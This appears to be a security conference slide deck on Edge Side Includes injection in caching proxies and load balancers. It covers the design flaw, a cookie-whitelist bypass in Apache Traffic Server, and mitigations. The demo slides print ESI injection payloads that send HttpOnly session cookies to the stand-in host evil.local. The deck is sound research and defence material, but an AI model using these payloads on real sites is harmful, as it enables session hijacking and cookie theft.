When caching servers and load balancers became an integral part of the Internet's infrastructure, vendors introduced what is called "Edge Side Includes" (ESI), a technology allowing malleability in caching systems. This legacy technology, still implemented in nearly all popular HTTP surrogates (caching/load balancing services), is dangerous by design and brings a yet unexplored vector for web-based attacks.
The ESI language consists of a small set of instructions represented by XML tags, served by the backend application server, which are processed on the Edge servers (load balancers, reverse proxies). Due to the upstream-trusting nature of Edge servers, the ESI engine tasked to parse and execute these instructions are not able to distinguish between ESI instructions legitimately provided by the application server, and malicious instructions injected by a malicious party. Through our research, we explored the risks that may be encountered through ESI injection: We identified that ESI can be used to perform SSRF, bypass reflected XSS filters (Chrome), and silently extract cookies. Because this attack vector leverages flaws on Edge servers and not on the client-side, the ESI engine can be reliably exploited to steal all cookies, including those protected by the HttpOnly mitigation flag, allowing JavaScript-less session hijacking.
Identified affected vendors include Akamai, Varnish Cache, Squid Proxy, Fastly, IBM WebSphere, Oracle WebLogic, F5, and countless language-specific solutions (NodeJS, Ruby, etc.). This presentation will start by defining ESI and visiting typical infrastructures leveraging this model. We will then delve into to the good stuff; identification and exploitation of popular ESI engines, and mitigation recommendations.
4. ESI — Brief Overview
The Weather Website
Forecast for
Monday
Tuesday
Wednesday
Montréal
27°C
23°C
31°C
5. ESI — Brief Overview
The Weather Website
Forecast for
Monday
Tuesday
Wednesday
Montréal
27°C
23°C
31°C
Variable Fragments
Static Fragment
6. ESI — Brief Overview
❖ Adds fragmentation to caching
❖ App Server send fragment markers in HTTP responses
<esi:[action] attr="val" />
❖ ESI tags are parsed by the HTTP surrogate (load balancer, proxy)
❖ Most engines require specific App Server HTTP Headers
7. ESI Features & Syntax — Include
//esi/page-1.html:
<html>
<p>This is page 1!</p>
<esi:include src="//api/page-2.html" />
</html>
//api/page-2.html:
<p>This is page 2!</p>
8. ESI Features & Syntax — Include
$ curl -s http://esi/page-1.html
<html>
<p>This is page 1!</p>
<p>This is page 2!</p>
</html>
11. ESI — Include Network Flow (Cache MISS)
①/1.html ②/1.html
12. ESI — Include Network Flow (Cache MISS)
①/1.html
1.html + ESI
②/1.html
③
13. ESI — Include Network Flow (Cache MISS)
①/1.html
1.html + ESI
②/1.html
③
ESI tags
processed
14. ESI — Include Network Flow (Cache MISS)
①/1.html
1.html + ESI
②/1.html
③
④/api/2.html
ESI tags
processed
15. ESI — Include Network Flow (Cache MISS)
①/1.html
1.html + ESI
②/1.html
③
④/api/2.html
2.html⑤
ESI tags
processed
16. ESI — Include Network Flow (Cache MISS)
①/1.html
1.html + ESI
②/1.html
③
④/api/2.html
2.html⑤
⑥ +
ESI tags
processed
17. ESI Features & Syntax — Variables
<esi:vars>$(VARIABLE_NAME)</esi:vars>
18. ESI Features & Syntax — Variables
<esi:vars>$(VARIABLE_NAME)</esi:vars>
$(HTTP_USER_AGENT) → Mozilla/5.0 (X11;[…]
$(QUERY_STRING) → city=Montreal&format=C
$(HTTP_COOKIE) → _ga=[…]&__utma=[…]
19. ESI — Vulnerabilities
ESI tags are sent by the application server…
… Parsed by the HTTP Surrogate.
How can the ESI Engine tell which tags are legitimate?
20. ESI — Vulnerabilities
ESI tags are sent by the application server…
… Parsed by the HTTP Surrogate.
How can the ESI Engine tell which tags are legitimate?
It can’t, and that’s a pretty big design flaw.
24. ESI Implementations — Apache Traffic Server
❖ Donated by Yahoo! to Apache
❖ ESI stack implemented, with bonus features
❖ Used by Yahoo, Apple
25. ESI Implementations — Apache Traffic Server
❖ Offers Cookie whitelisting
❖ Critical cookies not accessible by ESI...
<esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌
26. ESI Implementations — Apache Traffic Server
❖ Offers Cookie whitelisting
❖ Critical cookies not accessible by ESI... or are they?
<esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌
<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅
27. ESI Implementations — Apache Traffic Server
❖ Offers Cookie whitelisting
❖ Critical cookies not accessible by ESI... or are they?
<esi:vars>$(HTTP_COOKIE{PHPSESSID})</esi:vars> ❌
<esi:vars>$(HTTP_HEADER{Cookie})</esi:vars> ✅
→ "_ga=[…]&PHPSESSID=b9gcvscc[…]"
31. DEMO 1 — Proof of concept
http://evil.local/username=attacker;session_cookie=s%3A...
Internet
32. DEMO 1
Now we know...
❖ … we can inject ESI tags,
❖ … we can leak HTTPOnly cookies,
❖ … we don’t need JavaScript.
Let’s crank the impact up a notch.
33. ESI Implementations — Oracle Web Cache
❖ Part of the 11g suite
❖ Usually serves WebLogic Application Servers
❖ Initial ESI specification implemented, plus features
34. DEMO 2 — Proof of concept
<esi:inline name="/js/jquery.js" />
var x = new XMLHttpRequest();
x.open("GET", "//evil.local/?
<esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>");
x.send();
</esi:inline>
35. DEMO 2 — Proof of concept
<esi:inline name="/js/jquery.js" />
var x = new XMLHttpRequest();
x.open("GET", "//evil.local/?
<esi:vars>$(HTTP_COOKIE{session_cookie})</esi:vars>");
x.send();
</esi:inline>
36. DEMO 2 — Proof of concept
<esi:inline name="/js/jquery.js" />
var x = new XMLHttpRequest();
x.open("GET", "//evil.local/?lHKlM77VbP79hDnMX2Gg...");
x.send();
</esi:inline>
37. DEMO 2 — Proof of concept
http://evil.local/?lHKlM77VbP79hDnMX2Gg...
Internet
38. DEMO 2
Now we know...
❖ … we can overwrite arbitrary cache entries,
❖ … we can leak HTTPOnly cookies,
❖ … JavaScript helps, but not required.
40. ESI — Mitigations
❖ mod_security with the OWASP Core Rule Set
❖ Proactive escaping
{
"first_name": "Louis",
"last_name": "<esi:include src="/page-2.html" />"
}
41. ESI — Mitigations
❖ mod_security with the OWASP Core Rule Set
❖ Proactive escaping
{
"first_name": "Louis",
"last_name": "<esi:include src="/page-2.html" />"
}
Invalid ESI tag!
42. ESI — Mitigations
❖ mod_security with the OWASP Core Rule Set
❖ Proactive escaping
{
"first_name": "Louis",
"last_name": "<esi:include src="/page-2.html" />"
}
"last_name": "<esi:include src=/page-2.html />"
❖ This is valid with Apache Traffic Server
Invalid ESI tag!